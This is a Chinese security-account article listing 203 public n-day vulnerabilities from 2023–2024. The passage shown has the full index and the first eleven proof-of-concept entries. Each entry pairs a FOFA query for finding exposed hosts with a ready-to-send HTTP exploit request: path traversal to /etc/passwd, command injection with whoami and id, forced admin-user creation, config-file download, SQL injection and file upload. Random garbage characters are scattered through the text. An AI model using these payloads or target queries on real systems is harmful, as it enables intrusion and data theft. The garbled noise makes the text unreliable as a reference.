互联网公开漏洞整理202309-202406( R8 k9 P1 \9 P/ r9 c) G) ]
道一安全 2024-06-05 07:41 北京* |: i7 T$ a" B0 [
以下文章来源于网络安全新视界 ,作者网络安全新视界
7 V1 }. K9 W7 Z! ?4 n/ r1 p( ~1 q+ x4 c; P
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。8 n9 E5 z$ z7 o4 E. u( A+ a
4 b- F, u' V4 D5 H5 R2 I漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
, G. T5 ], q7 K3 b# r; l( e8 v" {$ d. P
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
# u* c# n2 s# i) Y; }
( ^' [* E) j& m& m2 ]$ K( w文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。. L& F$ t. u2 M) @
( B4 d- X: X# E1 M5 J9 g
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。% B0 l$ S$ w# o/ ], Z2 G
5 _9 O. E" A1 q7 `* ?
E3 e4 w# g1 d. W0 c) T
声明
' t- e/ \+ W. l8 `4 h
* P8 [* s; D4 O1 j7 U$ U为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
* d3 p( u l- Z/ |5 L3 P$ Y$ l$ a
+ l6 o" {9 K7 ^+ ^" A& O, o9 m有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。- g: L* m/ d; E
' \8 f: D' ^0 G+ i! Z+ k
! H1 m; i5 a8 n. G' v) a) U: m. i
目录2 y: \ K1 M- H' m$ C
1 j4 T5 }7 ~9 s, ~2 @
01" Q; u3 b2 W4 ?; X) S. w- o
" t% N+ `! s! T3 b+ a
1. StarRocks MPP数据库未授权访问
* r8 O9 M7 E2 d- k& k9 e3 `2. Casdoor系统static任意文件读取2 _/ D3 J/ s& P4 i
3. EasyCVR智能边缘网关 userlist 信息泄漏% o4 R: _+ `9 X
4. EasyCVR视频管理平台存在任意用户添加
6 `6 U+ H6 j$ K) k9 p: S5. NUUO NVR 视频存储管理设备远程命令执行
4 z3 r$ u" [2 P, r/ h2 S6. 深信服 NGAF 任意文件读取
7 s! s9 X* g+ Z# {* K0 Y7. 鸿运主动安全监控云平台任意文件下载2 r! N- Q' p8 \
8. 斐讯 Phicomm 路由器RCE
: |; ]. ^* Q |; A. h y9. 稻壳CMS keyword 未授权SQL注入9 P( g& ~' g# Z; l; c! D
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
8 m; _0 T) z% g8 Z2 J2 b11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
2 L0 c7 |: B* U, E- f12. Jorani < 1.0.2 远程命令执行
/ _$ g4 n! ~0 e7 v, O& ~9 i13. 红帆iOffice ioFileDown任意文件读取
% X' Z3 v) N* S. j) c) i8 q2 ^$ M# X14. 华夏ERP(jshERP)敏感信息泄露7 D6 ^% W8 }6 k
15. 华夏ERP getAllList信息泄露' Q. r2 {' V+ \: t6 f: ]
16. 红帆HFOffice医微云SQL注入
: c4 c- M! i5 c0 P( s17. 大华 DSS itcBulletin SQL 注入8 \! g0 K9 ]0 h% a; o& q
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
: ?; n& L9 I0 M8 d( `6 o' `. f% s19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
0 W4 ] E' ]( c* b0 @& F0 f6 C20. 大华ICC智能物联综合管理平台任意文件读取
/ X: b, {( O! R+ T. ?& R2 ~; Z21. 大华ICC智能物联综合管理平台random远程代码执行
; I) u5 d) y" f; w& G# h: W8 d22. 大华ICC智能物联综合管理平台 log4j远程代码执行
( Q2 Z1 f2 p5 ?- X23. 大华ICC智能物联综合管理平台 fastjson远程代码执行: x; ]/ }! k4 n
24. 用友NC 6.5 accept.jsp任意文件上传1 |% G% z3 a9 m9 G6 Q" z) A
25. 用友NC registerServlet JNDI 远程代码执行9 c6 C* v' E' B
26. 用友NC linkVoucher SQL注入
+ W& r# o9 H" O1 R. L27. 用友 NC showcontent SQL注入* m M$ m: O- s5 R# v0 [/ s
28. 用友NC grouptemplet 任意文件上传' t; H. i) t9 N- x. E
29. 用友NC down/bill SQL注入
. q) M; J& X' t8 k30. 用友NC importPml SQL注入
0 @2 H: F/ S: N' n) z2 [31. 用友NC runStateServlet SQL注入
; Z2 v! s' q, [0 z6 [32. 用友NC complainbilldetail SQL注入
/ Q: s" R1 J* p! N% P) a: W: E33. 用友NC downTax/download SQL注入
3 j9 Z7 L e/ I. |$ p) d34. 用友NC warningDetailInfo接口SQL注入
; y6 R) I" }# _; q- n% X35. 用友NC-Cloud importhttpscer任意文件上传
0 e5 g4 r1 Z1 ^+ m% n4 R4 [36. 用友NC-Cloud soapFormat XXE
" O- S) E& r5 F: t3 L2 d/ M37. 用友NC-Cloud IUpdateService XXE y4 z- n- G. V; i( P
38. 用友U8 Cloud smartweb2.RPC.d XXE$ J* l$ V( [/ K# h' @( y, K8 |& O( k) E
39. 用友U8 Cloud RegisterServlet SQL注入
a, s. ]8 B3 `- ?40. 用友U8-Cloud XChangeServlet XXE
( I+ R; }& L2 U3 j+ q: r41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
7 k6 ~' ^* I2 v42. 用友GRP-U8 SmartUpload01 文件上传0 r- z% F U$ i- I+ @( T
43. 用友GRP-U8 userInfoWeb SQL注入致RCE5 ^+ C$ \7 F3 X/ |
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
j$ x6 {* x, U$ }45. 用友GRP-U8 ufgovbank XXE/ ?" v; d0 D$ T1 B
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
8 i" O+ ~: g1 W) x0 h0 U! v* L2 ]7 V47. 用友GRP A++Cloud 政府财务云 任意文件读取
1 s9 ^" b! L9 l) x9 h; }48. 用友U8 CRM swfupload 任意文件上传
$ l0 J* i) O% q0 K, w0 {49. 用友U8 CRM系统uploadfile.php接口任意文件上传
2 D% t( |4 Q" N; J50. QDocs Smart School 6.4.1 filterRecords SQL注入% l/ R* p9 Q# C/ i, g
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
1 C! F u) e' k! P52. 泛微E-Office json_common.php sql注入
" {( c/ o, e; I: N53. 迪普 DPTech VPN Service 任意文件上传
) q' j+ I# @" n9 H54. 畅捷通T+ getstorewarehousebystore 远程代码执行; f; a' Z- U6 t) q- E9 [
55. 畅捷通T+ getdecallusers信息泄露
& `# n6 `1 z; E C1 y56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
v( ]# F4 K5 a1 J7 P/ ]57. 畅捷通T+ keyEdit.aspx SQL注入3 |! k& v& m! q6 x
58. 畅捷通T+ KeyInfoList.aspx sql注入
6 T- E4 S( O+ Z2 O% ~ x59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行' k) m5 t5 d7 j4 j
60. 百卓Smart管理平台 importexport.php SQL注入
7 c3 \* |4 X0 `8 {61. 浙大恩特客户资源管理系统 fileupload 任意文件上传9 Q; C2 S$ h5 Z' y; g$ B. `
62. IP-guard WebServer 远程命令执行' d7 j- z" }! s/ ~( B' j) K- L
63. IP-guard WebServer任意文件读取
1 R& G& Z9 q: }; i( `64. 捷诚管理信息系统CWSFinanceCommon SQL注入6 j& _' [* r' k! l' X$ b
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过6 W8 e$ C) B7 _0 e0 y/ `+ D& w
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入" @& U8 I$ b+ R9 V
67. 万户ezOFFICE wpsservlet任意文件上传
1 g+ J* k$ Z: l1 `" w7 M& g# o68. 万户ezOFFICE wf_printnum.jsp SQL注入
& K# x2 C+ H2 f/ I+ V69. 万户 ezOFFICE contract_gd.jsp SQL注入
; F; q; @, `, t9 T. R8 N70. 万户ezEIP success 命令执行
! i; O& z$ R! a% b6 ^( M5 _71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
3 c E b6 g4 m" D72. 致远OA getAjaxDataServlet XXE9 I% I- t5 A& g* H# i
73. GeoServer wms远程代码执行
7 S T% e/ f! N/ [" P74. 致远M3-server 6_1sp1 反序列化RCE Y& y' ~. k2 F3 F! I$ g6 j/ u9 |
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE; e! w' T# h% P1 j* j$ Y! J
76. 新开普掌上校园服务管理平台service.action远程命令执行
& G# B# N6 l6 k1 M77. F22服装管理软件系统UploadHandler.ashx任意文件上传3 ~0 Q' S# C. [
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传7 y% G% n* }1 P5 T/ l# N
79. BYTEVALUE 百为流控路由器远程命令执行
2 P6 o. x7 D( G& [6 g/ e& n, _80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
: h5 }) E# L+ Z7 T81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
: N) d( r X6 t7 m) `0 l+ m3 v82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
6 }: d" [0 n3 v: X% m83. JeecgBoot testConnection 远程命令执行6 C8 A8 b4 }% b5 Q
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入- L; M2 i) L3 W+ c0 p/ j
85. SysAid On-premise< 23.3.36远程代码执行, |. Z5 j' g' [5 i( `% i# @
86. 日本tosei自助洗衣机RCE" [( s1 D' u" I3 o4 A( c
87. 安恒明御安全网关aaa_local_web_preview文件上传
& m- Y$ T! o' q88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行8 J( a$ t, n* P& q/ b2 w, \+ S8 r
89. 致远互联FE协作办公平台editflow_manager存在sql注入
! z" N/ U/ T1 [* ]/ v: t90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行! U) R3 \- \8 u) D
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
6 W7 X( V3 l% q5 j92. 海康威视运行管理中心session命令执行
; u/ W, V. b' U$ W+ n93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
# b7 D8 B7 }6 _; b) h94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传" M/ o; t, s1 Z R
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行0 H$ E! B z8 ^+ b
96. Apache OFBiz 18.12.11 groovy 远程代码执行1 f3 z& B( p0 c! \
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行1 A& J. C: `3 r; r1 ]- x2 H
98. SpiderFlow爬虫平台远程命令执行6 z0 y0 H2 G/ C" [" P2 j
99. Ncast盈可视高清智能录播系统busiFacade RCE9 W1 Y3 B4 T* k- Z+ ?( O! m: k
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传. d! [4 s0 l8 @5 x' I( E; C
101. ivanti policy secure-22.6命令注入; r! Q; W& w# y' Y2 `
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行( G- b: U) d3 e& y
103. Ivanti Pulse Connect Secure VPN XXE
# w f- q% K/ _# h# D104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
! i; `" g' j- r6 F8 z6 }105. SpringBlade v3.2.0 export-user SQL 注入
4 B6 Y* x' l: A' M2 y) q106. SpringBlade dict-biz/list SQL 注入
+ ?7 E) { f5 N/ @- \: R107. SpringBlade tenant/list SQL 注入: I( b0 j+ n4 r; a6 W$ m
108. D-Tale 3.9.0 SSRF3 Q/ q% O6 j- ] C
109. Jenkins CLI 任意文件读取
- m2 G4 [4 O; K- y' _. ^ v110. Goanywhere MFT 未授权创建管理员
7 @* G5 t/ n. D$ v1 I+ ^111. WordPress Plugin HTML5 Video Player SQL注入
* ?" ^2 v/ E, w4 Y8 t2 _112. WordPress Plugin NotificationX SQL 注入- e7 Z& O0 V+ ~) M A- i7 T
113. WordPress Automatic 插件任意文件下载和SSRF+ Y8 G# z7 x4 i |
114. WordPress MasterStudy LMS插件 SQL注入' o" T) v' n- ?4 o9 O
115. WordPress Bricks Builder <= 1.9.6 RCE$ ?- J4 y. T; Z( F$ _9 `" C. m: J! t
116. wordpress js-support-ticket文件上传
2 u8 O6 C( A) s- u# J6 E117. WordPress LayerSlider插件SQL注入
2 ]/ q4 b! w% U/ Y! o" F: D118. 北京百绰智能S210管理平台uploadfile.php任意文件上传& f! m7 { H% ^
119. 北京百绰智能S20后台sysmanageajax.php sql注入7 k1 J! Q! q# g; b+ }8 q
120. 北京百绰智能S40管理平台导入web.php任意文件上传- B' d7 r4 I" [/ K1 B
121. 北京百绰智能S42管理平台userattestation.php任意文件上传; x: g+ m+ z6 D: W( E
122. 北京百绰智能s200管理平台/importexport.php sql注入$ \$ C; r) I- m/ H* [1 w
123. Atlassian Confluence 模板注入代码执行
0 p& l7 w2 d- s5 e k! K9 k7 U, a( L/ M0 q124. 湖南建研工程质量检测系统任意文件上传* v1 x0 F1 y# ~ `
125. ConnectWise ScreenConnect身份验证绕过
# |4 @6 E- x/ o; [% {4 B126. Aiohttp 路径遍历5 x+ z# f: f9 P C, _
127. 广联达Linkworks DataExchange.ashx XXE
6 Z2 h+ ~: k- b d9 i, [128. Adobe ColdFusion 反序列化$ z6 L4 r/ u+ \/ X, Q @, B C: x1 x
129. Adobe ColdFusion 任意文件读取
: o9 {. ^4 G- [6 d8 Q. p ^130. Laykefu客服系统任意文件上传5 j# K( P; ?; s1 g
131. Mini-Tmall <=20231017 SQL注入/ h2 s' ^$ ?3 [ k7 @* t
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
1 A2 Y2 P5 t6 R# M4 e3 S133. H5 云商城 file.php 文件上传
. U' y' H3 ]% W, r! W6 D: s134. 网康NS-ASG应用安全网关index.php sql注入
! Z! L( C4 u% n1 M" ~5 }6 S3 e1 A135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
2 s" V2 J: ]5 l ~136. NextChat cors SSRF. a9 V3 F! f w( S& x' _! p
137. 福建科立迅通信指挥调度平台down_file.php sql注入+ e' I- R, K3 s) _
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
) i& P+ t1 Q+ ?% R3 K# I9 @139. 福建科立讯通信指挥调度平台editemedia.php sql注入
+ m: q. B6 p+ [* L+ x140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入! z! S; P @/ d4 K! R) ~: N% e
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
4 _9 r7 x! K! ]% a2 J! ^0 t9 ^# ~' \142. CMSV6车辆监控平台系统中存在弱密码
3 T# l1 R0 u7 w: {% e4 [$ t8 J9 n6 P5 x143. Netis WF2780 v2.1.40144 远程命令执行
5 o. R& ^% r2 A144. D-Link nas_sharing.cgi 命令注入
8 s& y2 n' j% @4 ]' K6 _5 n3 F145. Palo Alto Networks PAN-OS GlobalProtect 命令注入. P8 N |) @ y! v
146. MajorDoMo thumb.php 未授权远程代码执行
& r! B- u$ V6 X2 @/ O% K147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
7 Q% i* K+ B" h& c148. CrushFTP 认证绕过模板注入
: f: e" k z3 s149. AJ-Report开源数据大屏存在远程命令执行
" U6 |. c! S8 i S150. AJ-Report 1.4.0 认证绕过与远程代码执行
) N2 s$ O8 ?0 [- j151. AJ-Report 1.4.1 pageList sql注入
0 X: r3 O6 d! V" v' G/ L8 |152. Progress Kemp LoadMaster 远程命令执行4 k |2 ?; v+ T( L1 R9 c
153. gradio任意文件读取2 d* S# ?& z8 ~* I
154. 天维尔消防救援作战调度平台 SQL注入
, |3 S: _' a9 u5 B ]155. 六零导航页 file.php 任意文件上传
5 ?; k1 B: m2 I$ z& i! [& ]% j; j156. TBK DVR-4104/DVR-4216 操作系统命令注入
6 s! R* ^2 P7 h; N$ E157. 美特CRM upload.jsp 任意文件上传& P: U' k9 G; T! \+ W6 t) g7 v
158. Mura-CMS-processAsyncObject存在SQL注入; z3 U) n2 G3 F
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
; x; w5 s6 b0 Y! w! U160. Sonatype Nexus Repository 3目录遍历与文件读取
8 Y+ d1 a% r4 t161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
7 s) R% K6 b$ i( M ^. M! {4 Y- I162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
u% a2 k/ h5 r163. 号卡极团分销管理系统 ue_serve.php 任意文件上传4 |) m+ j C) [' Y& C
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传: {4 G2 R5 B8 x& S
165. OrangeHRM 3.3.3 SQL 注入# D4 [! X. S1 C. [+ J/ @ U
166. 中成科信票务管理平台SeatMapHandler SQL注入3 D% v8 {- p \; X- C" g1 U
167. 精益价值管理系统 DownLoad.aspx任意文件读取5 ?& m: n5 p1 ]2 [& C
168. 宏景EHR OutputCode 任意文件读取4 M: T. F+ s" n6 q2 S
169. 宏景EHR downlawbase SQL注入. S( b5 B' c/ Q: O) g9 r3 }* ?8 [
170. 宏景EHR DisplayExcelCustomReport 任意文件读取1 }0 y9 j7 }4 n- c
171. 通天星CMSV6车载定位监控平台 SQL注入
/ C" d7 n$ F' s6 y5 F. n0 N172. DT-高清车牌识别摄像机任意文件读取
. e: P, d' Z5 g# ^5 v( ^; E2 l& e173. Check Point 安全网关任意文件读取$ G5 X/ F: r7 C V1 ^8 @. {
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
$ O& I2 Z5 Z% Q; R' ~175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
. V9 [: ~& h: a5 \176. 电信网关配置管理系统 rewrite.php 文件上传# B: d$ ?. D# z2 c
177. H3C路由器敏感信息泄露
1 O/ p5 ^3 Y% k9 w6 ~2 c8 S+ `+ [178. H3C校园网自助服务系统-flexfileupload-任意文件上传 k r7 A/ x, C' |5 `7 q% [+ t) E
179. 建文工程管理系统存在任意文件读取6 x# y" s+ @5 `# E G" s- ~) Q
180. 帮管客 CRM jiliyu SQL注入
% ^) g* G8 w' Y0 K4 f. ~( f181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入- E; N) U. O( a1 l; B3 y8 y3 C
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
6 J: S9 K; @+ Y! I) V1 z4 {183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
+ E, r/ a; ?! W4 @184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
7 _2 r6 B: x& n( W/ T185. 瑞友天翼应用虚拟化系统SQL注入6 t5 d2 V" e: d7 X- ^
186. F-logic DataCube3 SQL注入$ g3 F/ \3 c2 a+ q* k- K# Q8 w
187. Mura CMS processAsyncObject SQL注入
6 ^3 s" v: ?' n# A$ [188. 叁体-佳会视频会议 attachment 任意文件读取; T7 P% y' `8 _! L
189. 蓝网科技临床浏览系统 deleteStudy SQL注入) J- G/ h5 j! h. p
190. 短视频矩阵营销系统 poihuoqu 任意文件读取- D; q, W" k8 w. U+ R
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
, B4 Q0 P/ B$ B' ?192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
+ _. l2 C3 T3 D: C5 X193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行& s' n5 \/ y* C" ]3 {
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
& p% k5 W5 h. z+ F$ Z4 F, o$ O195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
' R; V) ]! f: j( T1 d! }& a196. 河南省风速科技统一认证平台密码重置7 z6 z2 A4 l7 y3 N
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入; j* V1 N8 M+ M3 u
198. 阿里云盘 WebDAV 命令注入( D' l: {. `# q* H
199. cockpit系统assetsmanager_upload接口 文件上传( v. X6 j% r+ I
200. SeaCMS海洋影视管理系统dmku SQL注入
. [3 k8 g6 c) g) B) C) p0 q" E201. 方正全媒体新闻采编系统 binary SQL注入
: s% s: T8 O0 U$ w& S4 X202. 微擎系统 AccountEdit任意文件上传
* f& y' F. j5 ^& \5 p' Z203. 红海云EHR PtFjk 文件上传
9 K" D3 T4 V" d% A' q/ x6 z) H l( X: s" L2 M6 w& o+ u0 A2 ?
POC列表
0 K$ A/ `$ l5 G" u( ]) k; _$ g7 D+ Y. v2 m* c
02
7 Z8 J Q/ {7 [
0 _8 {6 e2 D, X7 c1. StarRocks MPP数据库未授权访问- a7 J! y6 b, H! W8 I* f6 |5 D0 v. k
FOFA :title="StarRocks"8 D; r6 a' X4 p4 N! g
GET /mem_tracker HTTP/1.15 o4 _* F, C" p3 a
Host: URL
, U0 e: S6 p( ~: X2 ~3 P! A8 l
i; [0 Y& \: m/ N0 D) G. h/ L q( {/ g" O3 V5 q
2. Casdoor系统static任意文件读取0 l7 j+ }! q/ @: j
FOFA :title="Casdoor"
& t8 b$ X9 A$ Z+ \4 \! gGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
2 J8 u( v) |8 `! U' {Host: xx.xx.xx.xx:9999
3 O* f ]$ h# CUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 D: x. _( m3 U8 n/ sConnection: close
: H7 z% Y1 U( g2 M# f! _) XAccept: */*
6 M/ ` u/ v+ Y! VAccept-Language: en6 Q- ?) _: M8 @. M9 T' J3 d
Accept-Encoding: gzip& ^* w. j2 K8 ?) o) c$ \8 c; b" F
* M5 C: `2 Y0 S
% {# ?1 ]* w# X: f; w/ y7 C
3. EasyCVR智能边缘网关 userlist 信息泄漏# c2 i- C2 J! S
FOFA :title="EasyCVR"5 V1 U% B4 y/ E. r* ?5 n5 z7 W( U
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.16 u8 W/ G- p: z3 a- Z7 ]
Host: xx.xx.xx.xx
+ [% ^9 S1 S! P# D! C& l2 a; z o3 W$ U# q
6 z% i; Y: J% F
4. EasyCVR视频管理平台存在任意用户添加
4 n; B4 n; |5 f& g0 [' fFOFA :title="EasyCVR"7 J9 V) K2 X+ O0 B" l
" Y& `4 D$ G* h. W7 Y5 k
password更改为自己的密码md5
( F7 ^% L% @1 tPOST /api/v1/adduser HTTP/1.1, X2 U+ Q9 j3 Q
Host: your-ip
4 V0 v. @% c3 N/ DContent-Type: application/x-www-form-urlencoded; charset=UTF-8
; Z) ^; q. ?- M9 }7 J- B6 }' p( C8 m0 m, Y( t. _. e
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1 p. i& l C& Y8 a+ [( @
, O2 ^( _+ T* `) A
' Z- N& K6 }" r. L, z5. NUUO NVR 视频存储管理设备远程命令执行' x9 u" Z, w( V- m
FOFA:title="Network Video Recorder Login"% d/ ?' a" ?( G y
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
: k3 }) ]- p* t; D* A! LHost: xx.xx.xx.xx
( D# ?- o! p% o- l, m7 @% `5 k6 w
- S6 O: \7 }! @! @
' v% [3 `. E; ~, O3 S |6. 深信服 NGAF 任意文件读取
4 f$ M, n+ N9 @% a2 `. G0 MFOFA:title="SANGFOR | NGAF"
( x; s' \" W a, J6 z5 O4 sGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
$ C% \5 _; c9 b6 ^. e$ m" cHost:
* B) d6 [) U* G* s6 ~
: k C! Y( X5 B( n
& Z, \: A' b+ Y- x% |7. 鸿运主动安全监控云平台任意文件下载
v# g9 E" o) ?7 }0 [, b5 |FOFA:body="./open/webApi.html"5 ~" _/ _( F( K; S1 g; w# P
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.17 S& t% }. M+ r1 u. T' `
Host:
( r+ ?, b, M( E$ V: I7 V9 }" } P% H4 ^, L' ]) K
# Z5 ]4 h0 l& @! R, d8. 斐讯 Phicomm 路由器RCE
+ b. y: f \2 a3 J: _+ o# GFOFA:icon_hash="-1344736688"+ m9 Q% ^) Y, {! B- i% x8 ]
默认账号admin登录后台后,执行操作" i* B5 H" g( ?# v& ?3 A+ Z& H% F
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1$ ~# @4 A+ u: L, z) x1 l; F: U
Host: x.x.x.x
3 g& d) A+ E3 h: T8 k% _# MCookie: sysauth=第一步登录获取的cookie
$ L$ |- z( |+ ^' ?Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz: m2 b7 W5 e6 o6 U7 z6 Z$ g
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.369 X! i, a2 |+ L+ \# P" a
7 }2 U3 e8 ^/ z
------WebKitFormBoundaryxbgjoytz
* M* a1 e" |$ W$ R7 K7 JContent-Disposition: form-data; name="wifiRebootEnablestatus"1 V% ^% a' n0 B9 A3 `+ ?: Q! c
- |& W5 [ w) H
%s
% D U; d5 \1 d------WebKitFormBoundaryxbgjoytz
$ X% @% i/ \9 Q; ]Content-Disposition: form-data; name="wifiRebootrange"1 ^; p I$ _' {; v% Q) e0 J$ e+ ^/ `: B
: d" N! ~ s i; I1 _12:00; id;, Z9 T( z6 f0 k* l
------WebKitFormBoundaryxbgjoytz
7 ^' g$ C4 ~6 H0 M% _; x4 z6 |Content-Disposition: form-data; name="wifiRebootendrange"
@$ s( j- R' H8 i# {$ P
; F7 _ X4 R* J6 r& U%s:
" [6 i' p0 W: V------WebKitFormBoundaryxbgjoytz
6 A$ I: L+ x2 iContent-Disposition: form-data; name="cururl2"& s4 O' A$ o7 v4 z9 D" Q1 V& E1 V
' ~6 P( M. t# s% j7 c* i' J3 l. B _
' O* e3 B9 q! `0 j
------WebKitFormBoundaryxbgjoytz--6 }/ j9 R: \# r3 h) x
- Z' c; F1 ?, y
0 r4 {1 {' n7 J- k
9. 稻壳CMS keyword 未授权SQL注入) i% L! Y8 I9 Q1 f ?9 x, M8 K
FOFA:app="Doccms"1 E) X9 @: D" B
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
) c8 ]4 f% n5 P/ j0 Q$ ?Host: x.x.x.x l2 j' o. Z. N( D9 o
3 h* `( [ l) P
3 f& L5 }5 B1 p- X% D8 K
payload为下列语句的二次Url编码' F- G" r) V# g7 u, p) n
" V( _' Z" n+ Z6 q$ u( T
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#( w1 J1 a* d$ ~4 s
/ I: K' z w% e# m- F
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
, z( G m4 f: |) @% u/ _FOFA:icon_hash="953405444"
, s1 z4 A1 f/ {! O& v8 e4 ~" o( B) M: ~$ H2 |' D
文件上传后响应中包含上传文件的路径
9 a# Q" R* n- }9 L/ @. o7 ?POST /eis/service/api.aspx?action=saveImg HTTP/1.1 g* n$ I* t' W
Host: x.x.x.x:xx
7 q$ d5 i2 _; r3 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.367 Z2 | f0 O U9 N$ ~$ N8 e
Content-Length: 197 E7 ^) S: P; z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9& y& n1 b1 \# q$ I( |) \
Accept-Encoding: gzip, deflate
( ?/ H& g, t0 T& p8 b- pAccept-Language: zh-CN,zh;q=0.9
8 B! v! m( _0 d% wConnection: close
' \, y B+ N V0 h4 qContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
1 S. I2 u$ Q2 A5 @( V3 p( v. p! J0 L$ x7 @8 z
------WebKitFormBoundaryxdgaqmqu
0 q) O. Z5 [& |" H9 n0 v9 BContent-Disposition: form-data; name="file"filename="icfitnya.txt"0 R3 w) ]" S# F! w
Content-Type: text/html
" c U* q" Z7 V$ }3 P1 Z: Q! N
( X' ~) j# Y# Y( Y! C& ^jmnqjfdsupxgfidopeixbgsxbf* [$ x' ?) C7 Y5 ^; d
------WebKitFormBoundaryxdgaqmqu--
4 E; J0 c: x+ G- ]6 N% D
, p# B! F8 E8 F2 }4 s0 @
; @, H) O9 ]5 _11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入. k0 C3 l. S" l3 ^ |# l2 O
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
5 d' X6 R2 y' ^4 l# S: D! fGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1! V* P% O4 l7 m8 E' _) T& N
Host: 127.0.0.1. H3 C3 Y a1 _9 T0 x0 O5 a
Pragma: no-cache
: B* Z% @$ F: y9 `0 Y8 _* N" sCache-Control: no-cache
